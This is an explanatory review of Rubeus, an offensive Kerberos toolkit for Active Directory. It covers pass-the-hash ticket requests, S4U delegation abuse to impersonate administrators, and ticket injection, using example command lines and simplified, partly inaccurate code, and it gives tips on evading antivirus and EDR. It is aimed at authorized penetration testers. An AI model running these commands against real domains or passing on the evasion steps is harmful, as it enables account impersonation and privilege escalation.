Rubeus: A C# Toolkit for Kerberos Exploitation in Active Directory Environments

Hook

While most authentication attacks require credentials, Rubeus can let you impersonate any domain user without ever knowing their password—by exploiting the mathematical elegance of Kerberos itself.

Context

Active Directory environments rely almost exclusively on Kerberos for authentication, a protocol designed in the 1980s at MIT and named after the mythological three-headed dog guarding the underworld. While Kerberos is cryptographically sound, its implementation in Windows Active Directory introduces numerous misconfigurations and features that can be abused for lateral movement and privilege escalation. Before Rubeus, security professionals relied on a fragmented toolkit: Mimikatz for credential extraction, Kekeo for some Kerberos manipulation, and Impacket for cross-platform attacks. Each tool had different syntax, capabilities, and operational characteristics.

Rubeus emerged from the GhostPack collection as a unified, C#-native solution for Kerberos manipulation on Windows. Created by Will Schroeder and other researchers, it consolidated years of Kerberos exploitation knowledge into a single binary that speaks the protocol natively. Rather than wrapping Windows APIs or relying on external tools, Rubeus implements raw Kerberos protocol messages using ASN.1 encoding, giving penetration testers surgical control over authentication flows. This approach allows techniques impossible through standard Windows authentication mechanisms, from requesting tickets with hash credentials to forging tickets entirely offline.

Technical Insight

Rubeus's architecture centers on direct implementation of the Kerberos protocol using ASN.1 Distinguished Encoding Rules (DER). The tool bypasses Windows authentication APIs entirely, constructing and parsing Kerberos messages at the byte level. This design choice enables attacks that standard Windows functions would prevent or detect.

The core of Rubeus is its ASN.1 encoding/decoding engine, which manually constructs protocol messages. When you request a Ticket Granting Ticket (TGT), Rubeus builds an AS-REQ (Authentication Service Request) message by hand. Here's a simplified example of how Rubeus requests a TGT using an NTLM hash instead of a plaintext password:

// Rubeus.exe asktgt /user:jdoe /rc4:8846f7eaee8fb117ad06bdd830b7586c /domain:corp.com

// Internally, Rubeus constructs the AS-REQ message
AS_REQ asReq = new AS_REQ(domain, username, etype);

// Uses the NTLM hash to encrypt the timestamp (pre-authentication)
byte[] timestamp = DateTime.UtcNow.ToFileTimeUtc();
byte[] encTimestamp = Crypto.KerberosEncrypt(
    etype, 
    keyType.rc4_hmac,
    rc4Hash, 
    timestamp
);

// Adds encrypted timestamp to PA-DATA
asReq.padata.Add(new PA_DATA(
    Constants.PA_ENC_TIMESTAMP,
    encTimestamp
));

// Sends raw bytes to domain controller on port 88
byte[] response = Networking.SendBytes(dcIP, 88, asReq.Encode());
AS_REP asRep = new AS_REP(response);

This low-level control enables the "pass-the-hash" technique for Kerberos, something Windows's native authentication functions don't support. The NTLM hash becomes the encryption key for the pre-authentication data, allowing ticket requests without ever knowing the plaintext password.

Rubeus's most powerful feature is its implementation of Service for User (S4U) extensions, which abuse delegation configurations. The S4U2Self and S4U2Proxy extensions were designed to allow services to obtain tickets on behalf of users. Rubeus weaponizes this: if an attacker compromises a service account configured for constrained delegation, they can impersonate any domain user to any service in the delegation list. The tool chains S4U2Self (requesting a service ticket to itself on behalf of a user) with S4U2Proxy (using that ticket to request access to the target service):

// Rubeus.exe s4u /user:serviceacct /rc4:hash /impersonateuser:administrator 
//   /msdsspn:cifs/fileserver.corp.com /ptt

// First, request TGS for service to itself (S4U2Self)
TGS_REQ s4uSelfReq = new TGS_REQ(
    tgt,
    "serviceacct",
    "serviceacct",
    domain,
    PAC_OPTIONS.resource_based_constrained_delegation
);

// Then use that ticket to request access to target (S4U2Proxy)
TGS_REQ s4uProxyReq = new TGS_REQ(
    tgt,
    s4uSelfTicket,
    targetSPN: "cifs/fileserver.corp.com"
);

// Inject final ticket into current logon session
LSA.ImportTicket(s4uProxyTicket, LUID.CurrentLogonSession);

The ticket injection mechanism interacts with the Local Security Authority Subsystem Service (LSASS) through undocumented Windows APIs. Rubeus uses the LsaCallAuthenticationPackage function with the KERB_SUBMIT_TKT_REQUEST structure to import tickets directly into memory, making them available for immediate use without writing to disk.

For operational security, Rubeus includes the 'tgtdeleg' trick, which exploits the Kerberos delegation mechanism itself to extract the current user's TGT without touching LSASS memory. When a user enables unconstrained delegation, Windows automatically includes a delegated TGT in service ticket requests. Rubeus creates a fake delegation scenario, triggering Windows to hand over a usable TGT through standard API calls—completely bypassing memory scraping that EDR solutions monitor.

The tool's certificate-based authentication support (PKINIT) represents another architectural sophistication. Rubeus can request TGTs using X.509 certificates instead of passwords, supporting both user and machine certificate authentication. This becomes devastating when combined with certificate theft or forged certificates from compromised Certificate Authorities, enabling long-term persistent access that survives password changes.

Gotcha

Rubeus's effectiveness comes with significant operational limitations. The tool is heavily signatured by every major antivirus and EDR solution. Running the pre-compiled binary will trigger immediate alerts in any mature security environment. Red teamers must recompile with obfuscation, rename function names, modify strings, or use in-memory execution through frameworks like Cobalt Strike. Even then, behavioral detection increasingly catches Rubeus's characteristic patterns—raw Kerberos traffic on port 88, LSASS handle requests, and ticket injection attempts.

Privilege requirements create another barrier. While some operations like Kerberoasting work with standard user privileges, ticket extraction from memory requires SeDebugPrivilege (typically local administrator), and certain attacks demand domain-level privileges to begin with. The tool can't magic you past initial access; it's a post-exploitation framework requiring existing footholds. Additionally, Rubeus is Windows-only and .NET-dependent. Environments running .NET Framework 3.5 or 4.0 are required, and the tool won't run on Linux attack platforms without significant modification (at which point Impacket becomes the better choice). The operational reality is that Rubeus works best when executed in-memory on already-compromised Windows systems.

Verdict

Use if: You're conducting authorized penetration tests or red team engagements against Active Directory environments and need precise control over Kerberos authentication flows. Rubeus excels when testing delegation configurations, certificate-based authentication security, or exploiting Kerberoastable service accounts. It's ideal for demonstrating risk to security teams, especially around unconstrained delegation, resource-based constrained delegation (RBCD), and certificate authority compromise scenarios. The tool is essential for post-exploitation lateral movement in Windows domains when you have initial access but need to pivot to additional systems or elevate privileges through ticket manipulation. Skip if: You're looking for defensive tools, automated vulnerability scanners, or need cross-platform capabilities. Rubeus has zero legitimate defensive use cases—it's purely offensive. If your attack platform is Linux-based or you need stealth in heavily monitored environments, Impacket provides similar capabilities with better OPSEC characteristics. Organizations wanting to test their defenses against these attacks should use purpose-built AD assessment tools like PingCastle or BloodHound for discovery, then carefully use Rubeus in isolated lab environments first. This is not a tool for production networks without explicit authorization and comprehensive understanding of Active Directory security.